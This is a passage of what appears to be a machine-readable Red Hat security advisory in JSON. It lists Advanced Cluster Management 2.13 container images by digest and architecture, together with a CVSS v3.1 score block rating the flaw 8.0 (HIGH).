"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
